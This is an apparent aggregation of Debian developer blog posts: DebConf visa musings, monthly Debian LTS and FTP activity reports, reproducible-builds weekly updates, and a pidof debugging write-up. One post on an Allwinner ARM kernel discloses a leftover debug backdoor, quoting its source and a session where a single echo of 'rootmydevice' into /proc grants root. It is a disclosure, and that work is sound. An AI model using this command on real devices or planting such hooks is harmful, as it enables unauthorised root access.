I found that all the media is distributed randomly and posted a ticket about it. As I m not even a java newbie, could somebody look at mokun s comment and help out please ? On the same project, there has been talk of migrating to github.com Now whatever little I know of git, it makes a copy of the whole repository under .git/ folder/directory so having multimedia assets under git is a bad, bad idea, as each multimedia binary format file would be unique and no possibility of diff. between two binary files even though they may be the same file with some addition or subtraction from earlier version. I did file a question but am unhappy with the answers given. Can anybody give some definitive answers if they have been able to do how I am proposing , if yes, how did they go about it ? And lastly Immigrants of the United States in 2000 by country of birth America was founded by immigrants. Everybody knows the story about American Indians, the originals of the land were over-powered by the European settlers. So any claim, then and now that immigration did not help United States is just a lie. This came due to a conversation on #debconf by andrewsh
[18:37:06] I d be more than happy myself to apply for an US tourist not transit visa when I really need it, as a transit visa isn t really useful, is just as costly as a tourist visa, and nearly as difficult to get as a tourist visa
[18:37:40] I m not entirely sure I wish to transit through the US in its Trumplandia incarnation either
[18:38:07] likely to be more difficult and unfun
FWIW I am in complete agreement with Andrew s assessment of how it might be with foreigners. It has been on my mind and thoughts for quite some time although andrewsh put it eloquently. But as always I m getting ahead of myself. The conversation is because debconf this year would be in Canada. For many a cheap flight, one of the likely layovers/stopover can be the United States. I actually would have gone one step further, even if it was cheap transit visa, it would equally be unfun as it would discriminate. About couple of years back, a friend of mine while explaining what visa is, put it rather succinctly the visa officer looks at only 3 things a. Your financial position something which tells that you can take care of your financial needs if things go south b. You are not looking to settle there unlawfully c. You are not a criminal. While costs do matter, what is disturbing more is the form of extremism being displayed therein. While Indians from the South Asian continent in US have been largely successful, love to be in peace (one-off incidents do and will happen anywhere) if I had to take a transit or tourist visa in this atmosphere, it would leave a bad taste in the mouth. When one of my best friends is a Muslim, 20% of the population in India is made of Muslims and 99% of the time both of us co-exist in peace I simply can t take any alternative ideology. Even in Freakonomics 2.0 the authors when they shared that it s less than 0.1 percent of Muslims who are engaged in terrorist activities, if they were even 1 percent than all the world s armed forces couldn t fight them and couldn t keep anyone safe. Which simply means that 99.99% of even all Muslims are good. This resonates strongly with me for number of reasons. One of my uncles in early to late 80 s had an opportunity for work to visit Russia for official work. He went there and there were Secret Police after him all the time. While he didn t know it, I later read it, that it was SOP (Standard Operating Procedure) when all and any foreigners came visiting the country, and not just foreigners, they had spies for their own citizens. Russka a book I read several years ago explained the paranoia beautifully. While U.S. in those days was a more welcoming place for him. I am thankful as well as find it strange that Canada and States have such different visa procedures. While Canada would simply look at the above things, probably discreetly inquire about you if you have been a bad boy/girl in any way and then make a decision which is fine. For United States, even for a transit visa I probably would have to go to Interview where my world view would probably be in conflict with the current American world view. Interestingly, while I was looking at conversations on the web and one thing that is missing there is that nobody has talked about intelligence community. What Mr. Trump is saying in not so many words is that our intelligence even with all the e-mails we monitor and everything we do, we still can t catch you. It almost seems like giving a back-handed compliment to the extremists saying you do a better job than our intelligence community. This doesn t mean that States doesn t have interesting things to give to the world, Star Trek conventions, Grand Canyon (which probably would require me more than a month or more to explore even a little part), NASA, Intel, AMD, SpaceX, CES (when it s held) and LPC (Linux Plumber s conference where whose who come to think of roadmap for GNU/Linux). What I wouldn t give to be a fly in the wall when LPC, CES happens in the States. What I actually found very interesting is that in the current Canadian Government, if what I read and heard is true, then Justin Trudeau, the Prime Minister of Canada made 50 of his cabinet female. Just like in the article, studies even in Indian parliament have shown that when women are in power, questions about social justice, equality, common good get asked and policies made. If I do get the opportunity to be part of debconf, I would like to see, hear, watch, learn how the women cabinet is doing things. I am assuming that reporting and analysis standards of whatever decisions are more transparent and more people are engaged in the political process to know what their elected representatives are doing. Mountain biking in British Columbia, Canada - source wikipedia.org One another interesting point I came to know is that Canada is home to bicycling paths. While I stopped bicycling years ago  as it has been becoming more and more dangerous to bicycle here in Pune as there is no demarcation for cyclists, I am sure lot of Canadians must be using this opportunity fully. Lastly, on the debconf preparation stage, things have started becoming a bit more urgent and hectic. From a monthly IRC meet, it has now become a weekly meet. Both the wiki and the website are slowly taking up shape. http://deb.li/dc17kbp is a nice way to know/see progress of the activities happening . One important decision that would be taken today is where people would stay during debconf. There are options between on-site and two places around the venue, one 1.9 km around, the other 5 km. mark. Each has its own good and bad points. It would be interesting to see which place gets selected and why.
Filed under: Miscellenous Tagged: #budget, #Canada, #debconf organization, #discrimination, #Equal Opportunity, #Fiber, #svn, #United States, #Version Control, Broadband, Git, Pakistan, Subversion

30 June 2016

Chris Lamb: Free software activities in June 2016

Here is my monthly update covering a large part of what I have been doing in the free software world (previously):
Debian My work in the Reproducible Builds project was covered in our weekly reports. (#58, #59 & #60)
Debian LTS

This month I have been paid to work 18 hours on Debian Long Term Support (LTS). In that time I did the following:
  • "Frontdesk" duties, triaging CVEs, etc.
  • Extended the lts-cve-triage.py script to ignore packages that are not subject to Long Term Support.

  • Issued DLA 512-1 for mantis fixing an XSS vulnerability.
  • Issued DLA 513-1 for nspr correcting a buffer overflow in a sprintf utility.
  • Issued DLA 515-1 for libav patching a memory corruption issue.
  • Issued DLA 524-1 for squidguard fixing a reflected cross-site scripting vulnerability.
  • Issued DLA 525-1 for gimp correcting a use-after-free vulnerability in the channel and layer properties parsing process.

Uploads
  • redis (2:3.2.1-1) New upstream bugfix release, plus subsequent upload to the backports repository.
  • python-django (1.10~beta1-1) New upstream experimental release.
  • libfiu (0.94-5) Misc packaging updates.


RC bugs

I also filed 170 FTBFS bugs against a7xpg, acepack, android-platform-dalvik, android-platform-frameworks-base, android-platform-system-extras, android-platform-tools-base, apache-directory-api, aplpy, appstream-generator, arc-gui-clients, assertj-core, astroml, bamf, breathe, buildbot, cached-property, calf, celery-haystack, charmtimetracker, clapack, cmake, commons-javaflow, dataquay, dbi, django-celery, django-celery-transactions, django-classy-tags, django-compat, django-countries, django-floppyforms, django-hijack, django-localflavor, django-markupfield, django-model-utils, django-nose, django-pipeline, django-polymorphic, django-recurrence, django-sekizai, django-sitetree, django-stronghold, django-taggit, dune-functions, elementtidy, epic4-help, fcopulae, fextremes, fnonlinear, foreign, fort77, fregression, gap-alnuth, gcin, gdb-avr, ggcov, git-repair, glance, gnome-twitch, gnustep-gui, golang-github-audriusbutkevicius-go-nat-pmp, golang-github-gosimple-slug, gprbuild, grafana, grantlee5, graphite-api, guacamole-server, ido, jless, jodreports, jreen, kdeedu-data, kdewebdev, kwalify, libarray-refelem-perl, libdbusmenu, libdebian-package-html-perl, libdevice-modem-perl, libindicator, liblrdf, libmail-milter-perl, libopenraw, libvisca, linuxdcpp, lme4, marble, mgcv, mini-buildd, mu-cade, mvtnorm, nose, octave-epstk, onioncircuits, opencolorio, parsec47, phantomjs, php-guzzlehttp-ringphp, pjproject, pokerth, prayer, pyevolve, pyinfra, python-asdf, python-ceilometermiddleware, python-django-bootstrap-form, python-django-compressor, python-django-contact-form, python-django-debug-toolbar, python-django-extensions, python-django-feincms, python-django-formtools, python-django-jsonfield, python-django-mptt, python-django-openstack-auth, python-django-pyscss, python-django-registration, python-django-tagging, python-django-treebeard, python-geopandas, python-hdf5storage, python-hypothesis, python-jingo, python-libarchive-c, python-mhash, python-oauth2client, python-proliantutils, python-pytc, python-restless, python-tidylib, python-websockets, pyvows, qct, qgo, qmidinet, quodlibet, r-cran-gss, r-cran-runit, r-cran-sn, r-cran-stabledist, r-cran-xml, rgl, rglpk, rkt, rodbc, ruby-devise-two-factor, ruby-json-schema, ruby-puppet-syntax, ruby-rspec-puppet, ruby-state-machine, ruby-xmlparser, ryu, sbd, scanlogd, signond, slpvm, sogo, sphinx-argparse, squirrel3, sugar-jukebox-activity, sugar-log-activity, systemd, tiles, tkrplot, twill, ucommon, urca, v4l-utils, view3dscene, xqilla, youtube-dl & zope.interface.

FTP Team

As a Debian FTP assistant I ACCEPTed 186 packages: akonadi4, alljoyn-core-1509, alljoyn-core-1604, alljoyn-gateway-1504, alljoyn-services-1504, alljoyn-services-1509, alljoyn-thin-client-1504, alljoyn-thin-client-1509, alljoyn-thin-client-1604, apertium-arg, apertium-arg-cat, apertium-eo-fr, apertium-es-it, apertium-eu-en, apertium-hbs, apertium-hin, apertium-isl, apertium-kaz, apertium-spa, apertium-spa-arg, apertium-tat, apertium-urd, arc-theme, argus-clients, ariba, beast-mcmc, binwalk, bottleneck, colorfultabs, dh-runit, django-modeltranslation, dq, dublin-traceroute, duktape, edk2, emacs-pdf-tools, eris, erlang-p1-oauth2, erlang-p1-sqlite3, erlang-p1-xmlrpc, faba-icon-theme, firefox-branding-iceweasel, golang-1.6, golang-defaults, golang-github-aelsabbahy-gonetstat, golang-github-howeyc-gopass, golang-github-oleiade-reflections, golang-websocket, google-android-m2repository-installer, googler, goto-chg-el, gr-radar, growl-for-linux, guvcview, haskell-open-browser, ipe, labplot, libalt-alien-ffi-system-perl, libanyevent-fcgi-perl, libcds-savot-java, libclass-ehierarchy-perl, libconfig-properties-perl, libffi-checklib-perl, libffi-platypus-perl, libhtml-element-library-perl, liblwp-authen-oauth2-perl, libmediawiki-dumpfile-perl, libmessage-passing-zeromq-perl, libmoosex-types-portnumber-perl, libmpack, libnet-ip-xs-perl, libperl-osnames-perl, libpodofo, libprogress-any-perl, libqtpas, librdkafka, libreoffice, libretro-beetle-pce-fast, libretro-beetle-psx, libretro-beetle-vb, libretro-beetle-wswan, libretro-bsnes-mercury, libretro-mupen64plus, libservicelog, libtemplate-plugin-datetime-perl, libtext-metaphone-perl, libtins, libzmq-ffi-perl, licensecheck, link-grammar, linux, linux-signed, lua-busted, magics++, mkalias, moka-icon-theme, neutron-vpnaas, newlisp, node-absolute-path, node-ejs, node-errs, node-has-flag, node-lodash-compat, node-strip-ansi, numba, numix-icon-theme, nvidia-graphics-drivers, nvidia-graphics-drivers-legacy-304xx, nvidia-graphics-drivers-legacy-340xx, obs-studio, opencv, pacapt, pgbackrest, postgis, powermock, primer3, profile-sync-daemon, pyeapi, pypandoc, pyssim, python-cutadapt, python-cymruwhois, python-fisx, python-formencode, python-hkdf, python-model-mommy, python-nanomsg, python-offtrac, python-social-auth, python-twiggy, python-vagrant, python-watcherclient, python-xkcd, pywps, r-bioc-deseq2, r-bioc-dnacopy, r-bioc-ensembldb, r-bioc-geneplotter, r-cran-adegenet, r-cran-adephylo, r-cran-distory, r-cran-fields, r-cran-future, r-cran-globals, r-cran-htmlwidgets, r-cran-listenv, r-cran-mlbench, r-cran-mlmrev, r-cran-pheatmap, r-cran-pscbs, r-cran-r.cache, refind, relatorio, reprotest, ring, ros-ros-comm, ruby-acts-as-tree, ruby-chronic-duration, ruby-flot-rails, ruby-numerizer, ruby-u2f, selenium-firefoxdriver, simgrid, skiboot, smtpping, snap-confine, snapd, sniffles, sollya, spin, subuser, superlu, swauth, swift-plugin-s3, syncthing, systemd-bootchart, tdiary-theme, texttable, tidy-html5, toxiproxy, twinkle, vmtk, wait-for-it, watcher, wcslib & xapian-core.

14 May 2016

Gunnar Wolf: Debugging backdoors and the usual software distribution for embedded-oriented systems

In the ARM world, to which I am still mostly a newcomer (although I've been already playing with ARM machines for over two years, I am a complete newbie compared to my Debian friends who live and breathe that architecture), the most common way to distribute operating systems is to distribute complete, already-installed images. I have ranted in the past on how those images ought to be distributed. Some time later, I also discussed on my blog on how most of this hardware requires unauditable binary blobs and other non-upstreamed modifications to Linux. In the meanwhile, I started teaching on the Embedded Linux diploma course in Facultad de Ingenier a, UNAM. It has been quite successful And fun. Anyway, one of the points we make emphasis on to our students is that the very concept of embedded makes the mere idea of downloading a pre-built, 4GB image, loaded with a (supposedly lightweight, but far fatter than my usual) desktop environment and whatnot an irony. As part of the "Linux Userspace" and "Boot process" modules, we make a lot of emphasis on how to build a minimal image. And even leaving installed size aside, it all boils down to trust. We teach mainly four different ways of setting up a system: Now... In the past few days, a huge vulnerability / oversight was discovered and made public, supporting my distrust of distribution forms that do not come from, well... The people we already know and trust to do this kind of work! Most current ARM chips cannot run with the stock, upstream Linux kernel. Then require a set of patches that different vendors pile up to support their basic hardware (remember those systems are almost always systems-on-a-chip (SoC)). Some vendors do take the hard work to try to upstream their changes that is, push the changes they did to the kernel for inclusion in mainstream Linux. This is a very hard task, and many vendors just abandon it. So, in many cases, we are stuck running with nonstandard kernels, full with huge modifications... And we trust them to do things right. After all, if they are knowledgeable enough to design a SoC, they should do at least decent kernel work, right? Turns out, it's far from the case. I have a very nice and nifty Banana Pi M3, based on the Allwinner A83T SoC. 2GB RAM, 8 ARM cores... A very nice little system, almost usable as a desktop. But it only boots with their modified 3.4.x kernel. This kernel has a very ugly flaw: A debugging mode left open, that allows any local user to become root. Even on a mostly-clean Debian system, installed by a chrooted debootstrap:
  1. Debian GNU/Linux 8 bananapi ttyS0
  2. banana login: gwolf
  3. Password:
  4. Last login: Thu Sep 24 14:06:19 CST 2015 on ttyS0
  5. Linux bananapi 3.4.39-BPI-M3-Kernel #9 SMP PREEMPT Wed Sep 23 15:37:29 HKT 2015 armv7l
  6. The programs included with the Debian GNU/Linux system are free software;
  7. the exact distribution terms for each program are described in the
  8. individual files in /usr/share/doc/*/copyright.
  9. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  10. permitted by applicable law.
  11. gwolf@banana:~$ id
  12. uid=1001(gwolf) gid=1001(gwolf) groups=1001(gwolf),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
  13. gwolf@banana:~$ echo rootmydevice > /proc/sunxi_debug/sunxi_debug
  14. gwolf@banana:~$ id
  15. groups=0(root),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),1001(gwolf)
Why? Oh, well, in this kernel somebody forgot to comment out (or outright remove!) the sunxi-debug.c file, or at the very least, a horrid part of code therein (it's a very small, simple file):
  1. if(!strncmp("rootmydevice",(char*)buf,12))
  2. cred = (struct cred *)__task_cred(current);
  3. cred->uid = 0;
  4. cred->gid = 0;
  5. cred->suid = 0;
  6. cred->euid = 0;
  7. cred->euid = 0;
  8. cred->egid = 0;
  9. cred->fsuid = 0;
  10. cred->fsgid = 0;
  11. printk("now you are root\n");
Now... Just by looking at this file, many things should be obvious. For example, this is not only dangerous and lazy (it exists so developers can debug by touching a file instead of... typing a password?), but also goes against the kernel coding guidelines the file is not documented nor commented at all. Peeking around other files in the repository, it gets obvious that many files lack from this same basic issue and having this upstreamed will become a titanic task. If their programmers tried to adhere to the guidelines to begin with, integration would be a much easier path. Cutting the wrong corners will just increase the needed amount of work. Anyway, enough said by me. Some other sources of information: There are surely many other mentions of this. I just had to repeat it for my local echo chamber, and for future reference in class! ;-)

30 April 2016

Chris Lamb: Free software activities in April 2016

Here is my monthly update covering a large part of what I have been doing in the free software world (previously):
Debian My work in the Reproducible Builds project was covered in our weekly reports. (#48, #49, #50, #51 & #52)
Uploads
  • redis (2:3.0.7-3) Adding, amongst some other changes, systemd LimitNOFILE support to allow a higher number of open file descriptors.


FTP Team

As a Debian FTP assistant I ACCEPTed 135 packages: aptitude, asm, beagle, blends, btrfs-progs, camitk, cegui-mk2, cmor-tables, containerd, debian-science, debops, debops-playbooks, designate-dashboard, efitools, facedetect, flask-testing, fstl, ganeti-os-noop, gnupg, golang-fsnotify, golang-github-appc-goaci, golang-github-benbjohnson-tmpl, golang-github-dchest-safefile, golang-github-docker-go, golang-github-dylanmei-winrmtest, golang-github-hawkular-hawkular-client-go, golang-github-hlandau-degoutils, golang-github-hpcloud-tail, golang-github-klauspost-pgzip, golang-github-kyokomi-emoji, golang-github-masterminds-semver-dev, golang-github-masterminds-vcs-dev, golang-github-masterzen-xmlpath, golang-github-mitchellh-ioprogress, golang-github-smartystreets-assertions, golang-gopkg-hlandau-configurable.v1, golang-gopkg-hlandau-easyconfig.v1, golang-gopkg-hlandau-service.v2, golang-objx, golang-pty, golang-text, gpaste, gradle-plugin-protobuf, grip, haskell-brick, haskell-hledger-ui, haskell-lambdabot-haskell-plugins, haskell-text-zipper, haskell-werewolf, hkgerman, howdoi, jupyter-client, jupyter-core, letsencrypt.sh, libbpp-phyl, libbpp-raa, libbpp-seq, libbpp-seq-omics, libcbor-xs-perl, libdancer-plugin-email-perl, libdata-page-pageset-perl, libevt, libevtx, libgit-version-compare-perl, libgovirt, libmsiecf, libnet-ldap-server-test-perl, libpgobject-type-datetime-perl, libpgobject-type-json-perl, libpng1.6, librest-client-perl, libsecp256k1, libsmali-java, libtemplates-parser, libtest-requires-git-perl, libtext-xslate-perl, linux, linux-signed, mandelbulber2, netlib-java, nginx, node-rc, node-utml, nvidia-cuda-toolkit, openfst, openjdk-9, openssl, php-cache-integration-tests, pulseaudio, pyfr, pygccxml, pytest-runner, python-adventure, python-arrayfire, python-django-feincms, python-fastimport, python-fitsio, python-imagesize, python-lib389, python-libtrace, python-neovim-gui, python3-proselint, pythonpy, pyzo, r-cran-ca, r-cran-fitbitscraper, r-cran-goftest, r-cran-rnexml, r-cran-rprotobuf, rrdtool, ruby-proxifier, ruby-seamless-database-pool, ruby-syslog-logger, rustc, s5, sahara-dashboard, salt-formula-ceilometer, salt-formula-cinder, salt-formula-glance, salt-formula-heat, salt-formula-horizon, salt-formula-keystone, salt-formula-neutron, salt-formula-nova, seer, simplejson, smrtanalysis, tiles-autotag, tqdm, tran, trove-dashboard, vim, vulkan, xapian-bindings & xapian-core.

14 February 2016

Lunar: Reproducible builds: week 42 in Stretch cycle

What happened in the reproducible builds effort between February 7th and February 13th 2016:

Toolchain fixes
  • James McCoy uploaded devscripts/2.16.1 which makes dcmd supports .buildinfo files. Original patch by josch.
  • Lisandro Dami n Nicanor P rez Meyer uploaded qt4-x11/4:4.8.7+dfsg-6 which make files created by qch reproducible by using a fixed date instead of the current time. Original patch by Dhole.
Norbert Preining rejected the patch submitted by Reiner Herrmann to make the CreationDate not appear in comments of DVI / PS files produced by TeX. He also mentioned that some timestamps can be replaced by using the -output-comment option and that the next version of pdftex will have patches inspired by reproducible build to mitigate the effects (see SOURCE_DATE_EPOCH patches) .

Packages fixed The following packages have become reproducible due to changes in their build dependencies: abntex, apt-dpkg-ref, arduino, c++-annotations, cfi, chaksem, clif, cppreference-doc, dejagnu, derivations, ecasound, fdutils, gnash, gnu-standards, gnuift, gsequencer, gss, gstreamer0.10, gstreamer1.0, harden-doc, haskell98-report, iproute2, java-policy, libbluray, libmodbus, lizardfs, mclibs, moon-buggy, nurpawiki, php-sasl, shishi, stealth, xmltex, xsom. The following packages became reproducible after getting fixed: Some uploads fixed some reproducibility issues, but not all of them: Patches submitted which have not made their way to the archive yet:
  • #813944 on cvm by Reiner Herrmann: remove gzip headers, fix permissions of some directories and the order of the md5sums.
  • #814019 on latexdiff by Reiner Herrmann: remove the current build date from documentation.
  • #814214 on rocksdb by Chris Lamb: add support for SOURCE_DATE_EPOCH.

reproducible.debian.net A new armhf build node has been added (thanks to Vagrant Cascadian) and integrated into the Jenkins setup for 4 new armhf builder jobs. (h01ger) All packages for Debian testing (Stretch) have been tested on armhf in just 42 days. It took 114 days to get the same point for unstable back when the armhf test infrastructure was much smaller. Package sets have been enabled for testing on armhf. (h01ger) Packages producing architecture-independent ( Arch:all ) binary packages together with architecture dependent packages targeted for specific architectures will now only be tested on matching architectures. (Steven Chamberlain, h01ger) As the Jenkins setup is now made of 252 different jobs, the overview has been split into 11 different smalller views. (h01ger)

Package reviews 222 reviews have been removed, 110 added and 50 updated in the previous week. 35 FTBFS reports were made by Chris Lamb, Danny Edel, and Niko Tyni.

Misc. The recordings of Ludovic Court s' talk at FOSDEM 16 about reproducible builds and GNU Guix is now available. One can also have a look at slides from Fabian Keil's talk about ElecrtroBSD and Baptiste Daroussin's talk about FreeBSD packages.

28 January 2016

Craig Small: pidof lost a shell

pidof is a program that reports the PID of a process that has the given command line. It has an option x which means scripts too . The idea behind this is if you have a shell script it will find it. Recently there was an issue raised saying pidof was not finding a shell script. Trying it out, pidof indeed could not find the sample script but found other scripts, what was going on? What is a script? Seems pretty simple really, a shell script is a text file that is interpreted by a shell program. At the top of the file you have a hash bang line which starts with #! and then the name of shell that is going to interpret the text. When you use the x option, the pidof uses the following code:
          if (task.cmd &amp;&amp;
                    !strncmp(task.cmd, cmd_arg1base, strlen(task.cmd)) &amp;&amp;
                    (!strcmp(program, cmd_arg1base)  
                    !strcmp(program_base, cmd_arg1)  
                    !strcmp(program, cmd_arg1)))
What this means if match if the process comm (task.cmd) and the basename (strip the path) of argv[1] match and one of the following: The Hash Bang Line Most scripts I have come across start with a line like
#!/bin/sh
Which means use the normal shell (on my system dash) shell interpreter. What was different in the test script had a first line of
#!/usr/bin/env sh
Which means run the program sh in a new environment. Could this be the difference? The first type of script has the following procfs files:
$ cat -e /proc/30132/cmdline
/bin/sh^@/tmp/pidofx^@
$ cut -f 2 -d' ' /proc/30132/stat
(pidofx)
The first line picks up argv[1] /tmp/pidofx while the second finds comm pidofx . The primary matching is satisfied as well as the first dot-point because the basename of argv[1] is pidofx . What about the script that uses env?
$ cat -e /proc/30232/cmdline
bash^@/tmp/pidofx^@
$ cut -f 2 -d' ' /proc/30232/stat
(bash)
The comm bash does not match the basename of argv[1] so this process is not found. How many execve? So the proc filesystem is reporting the scripts differently depending on the first line, but why? The fields change depending on what process is running and that is dependent on the execve function calls. A typical script has a single execve call, the strace output shows:
29332 execve("./pidofx", ["./pidofx"], [/* 24 vars */]) = 0
While the env has a few more:
29477 execve("./pidofx", ["./pidofx"], [/* 24 vars */]) = 0
 29477 execve("/usr/local/bin/sh", ["sh", "./pidofx"], [/* 24 vars */]) = -1 ENOENT (No such file or directory)
 29477 execve("/usr/bin/sh", ["sh", "./pidofx"], [/* 24 vars */]) = -1 ENOENT (No such file or directory)
 29477 execve("/bin/sh", ["sh", "./pidofx"], [/* 24 vars */]) = 0
The first execve is the same for both, but then env is called and it goes on its merry way to find sh. After trying /usr/local/bin, /usr/bin it finds sh in /bin and execs this program. Because of there are two successful execve calls, the procfs fields are different. What Next? So now the mystery of pidof missing scripts now has a reasonable reason. The problem is, how to fix pidof? There doesn t seem to be a fix that isn t a kludge. Hard-coding potential script names seems just evil but there doesn t seem to be a way to differentiate between a script using env and, say, vi ./pidofx . If you got some ideas, comment below or in the issue on gitlab.

18 October 2015

Lunar: Reproducible builds: week 25 in Stretch cycle

What happened in the reproducible builds effort this week: Toolchain fixes Niko Tyni wrote a new patch adding support for SOURCE_DATE_EPOCH in Pod::Man. This would complement or replace the previously implemented POD_MAN_DATE environment variable in a more generic way. Niko Tyni proposed a fix to prevent mtime variation in directories due to debhelper usage of cp --parents -p. Packages fixed The following 119 packages became reproducible due to changes in their build dependencies: aac-tactics, aafigure, apgdiff, bin-prot, boxbackup, calendar, camlmix, cconv, cdist, cl-asdf, cli-common, cluster-glue, cppo, cvs, esdl, ess, faucc, fauhdlc, fbcat, flex-old, freetennis, ftgl, gap, ghc, git-cola, globus-authz-callout-error, globus-authz, globus-callout, globus-common, globus-ftp-client, globus-ftp-control, globus-gass-cache, globus-gass-copy, globus-gass-transfer, globus-gram-client, globus-gram-job-manager-callout-error, globus-gram-protocol, globus-gridmap-callout-error, globus-gsi-callback, globus-gsi-cert-utils, globus-gsi-credential, globus-gsi-openssl-error, globus-gsi-proxy-core, globus-gsi-proxy-ssl, globus-gsi-sysconfig, globus-gss-assist, globus-gssapi-error, globus-gssapi-gsi, globus-net-manager, globus-openssl-module, globus-rsl, globus-scheduler-event-generator, globus-xio-gridftp-driver, globus-xio-gsi-driver, globus-xio, gnome-control-center, grml2usb, grub, guilt, hgview, htmlcxx, hwloc, imms, kde-l10n, keystone, kimwitu++, kimwitu-doc, kmod, krb5, laby, ledger, libcrypto++, libopendbx, libsyncml, libwps, lprng-doc, madwimax, maria, mediawiki-math, menhir, misery, monotone-viz, morse, mpfr4, obus, ocaml-csv, ocaml-reins, ocamldsort, ocp-indent, openscenegraph, opensp, optcomp, opus, otags, pa-bench, pa-ounit, pa-test, parmap, pcaputils, perl-cross-debian, prooftree, pyfits, pywavelets, pywbem, rpy, signify, siscone, swtchart, tipa, typerep, tyxml, unison2.32.52, unison2.40.102, unison, uuidm, variantslib, zipios++, zlibc, zope-maildrophost. The following packages became reproducible after getting fixed: Packages which could not be tested: Some uploads fixed some reproducibility issues but not all of them: Patches submitted which have not made their way to the archive yet: Lunar reported that test strings depend on default character encoding of the build system in ongl. reproducible.debian.net The 189 packages composing the Arch Linux core repository are now being tested. No packages are currently reproducible, but most of the time the difference is limited to metadata. This has already gained some interest in the Arch Linux community. An explicit log message is now visible when a build has been killed due to the 12 hours timeout. (h01ger) Remote build setup has been made more robust and self maintenance has been further improved. (h01ger) The minimum age for rescheduling of already tested amd64 packages has been lowered from 14 to 7 days, thanks to the increase of hardware resources sponsored by ProfitBricks last week. (h01ger) diffoscope development diffoscope version 37 has been released on October 15th. It adds support for two new file formats (CBFS images and Debian .dsc files). After proposing the required changes to TLSH, fuzzy hashes are now computed incrementally. This will avoid reading entire files in memory which caused problems for large packages. New tests have been added for the command-line interface. More character encoding issues have been fixed. Malformed md5sums will now be compared as binary files instead of making diffoscope crash amongst several other minor fixes. Version 38 was released two days later to fix the versioned dependency on python3-tlsh. strip-nondeterminism development strip-nondeterminism version 0.013-1 has been uploaded to the archive. It fixes an issue with nonconformant PNG files with trailing garbage reported by Roland Rosenfeld. disorderfs development disorderfs version 0.4.1-1 is a stop-gap release that will disable lock propagation, unless --share-locks=yes is specified, as it still is affected by unidentified issues. Documentation update Lunar has been busy creating a proper website for reproducible-builds.org that would be a common location for news, documentation, and tools for all free software projects working on reproducible builds. It's not yet ready to be published, but it's surely getting there. Homepage of the future reproducible-builds.org website  Who's involved?  page of the future reproducible-builds.org website Package reviews 103 reviews have been removed, 394 added and 29 updated this week. 72 FTBFS issues were reported by Chris West and Niko Tyni. New issues: random_order_in_static_libraries, random_order_in_md5sums.

3 August 2015

Lunar: Reproducible builds: week 14 in Stretch cycle

What happened in the reproducible builds effort this week: Toolchain fixes akira submitted a patch to make cdbs export SOURCE_DATE_EPOCH. She uploded a package with the enhancement to the experimental reproducible repository. Packages fixed The following 15 packages became reproducible due to changes in their build dependencies: dracut, editorconfig-core, elasticsearch, fish, libftdi1, liblouisxml, mk-configure, nanoc, octave-bim, octave-data-smoothing, octave-financial, octave-ga, octave-missing-functions, octave-secs1d, octave-splines, valgrind. The following packages became reproducible after getting fixed: Some uploads fixed some reproducibility issues but not all of them: In contrib, Dmitry Smirnov improved libdvd-pkg with 1.3.99-1-1. Patches submitted which have not made their way to the archive yet: reproducible.debian.net Four armhf build hosts were provided by Vagrant Cascadian and have been configured to be used by jenkins.debian.net. Work on including armhf builds in the reproducible.debian.net webpages has begun. So far the repository comparison page just shows us which armhf binary packages are currently missing in our repo. (h01ger) The scheduler has been changed to re-schedule more packages from stretch than sid, as the gcc5 transition has started This mostly affects build log age. (h01ger) A new depwait status has been introduced for packages which can't be built because of missing build dependencies. (Mattia Rizzolo) debbindiff development Finally, on August 31st, Lunar released debbindiff 27 containing a complete overhaul of the code for the comparison stage. The new architecture is more versatile and extensible while minimizing code duplication. libarchive is now used to handle cpio archives and iso9660 images through the newly packaged python-libarchive-c. This should also help support a couple other archive formats in the future. Symlinks and devices are now properly compared. Text files are compared as Unicode after being decoded, and encoding differences are reported. Support for Sqlite3 and Mono/.NET executables has been added. Thanks to Valentin Lorentz, the test suite should now run on more systems. A small defiency in unquashfs has been identified in the process. A long standing optimization is now performed on Debian package: based on the content of the md5sums control file, we skip comparing files with matching hashes. This makes debbindiff usable on packages with many files. Fuzzy-matching is now performed for files in the same container (like a tarball) to handle renames. Also, for Debian .changes, listed files are now compared without looking the embedded version number. This makes debbindiff a lot more useful when comparing different versions of the same package. Based on the rearchitecturing work has been done to allow parallel processing. The branch now seems to work most of the time. More test needs to be done before it can be merged. The current fuzzy-matching algorithm, ssdeep, has showed disappointing results. One important use case is being able to properly compare debug symbols. Their path is made using the Build ID. As this identifier is made with a checksum of the binary content, finding things like CPP macros is much easier when a diff of the debug symbols is available. Good news is that TLSH, another fuzzy-matching algorithm, has been tested with much better results. A package is waiting in NEW and the code is ready for it to become available. A follow-up release 28 was made on August 2nd fixing content label used for gzip2, bzip2 and xz files and an error on text files only differing in their encoding. It also contains a small code improvement on how comments on Difference object are handled. This is the last release name debbindiff. A new name has been chosen to better reflect that it is not a Debian specific tool. Stay tuned! Documentation update Valentin Lorentz updated the patch submission template to suggest to write the kind of issue in the bug subject. Small progress have been made on the Reproducible Builds HOWTO while preparing the related CCCamp15 talk. Package reviews 235 obsolete reviews have been removed, 47 added and 113 updated this week. 42 reports for packages failing to build from source have been made by Chris West (Faux). New issue added this week: haskell_devscripts_locale_substvars. Misc. Valentin Lorentz wrote a script to report packages tested as unreproducible installed on a system. We encourage everyone to run it on their systems and give feedback!

Next.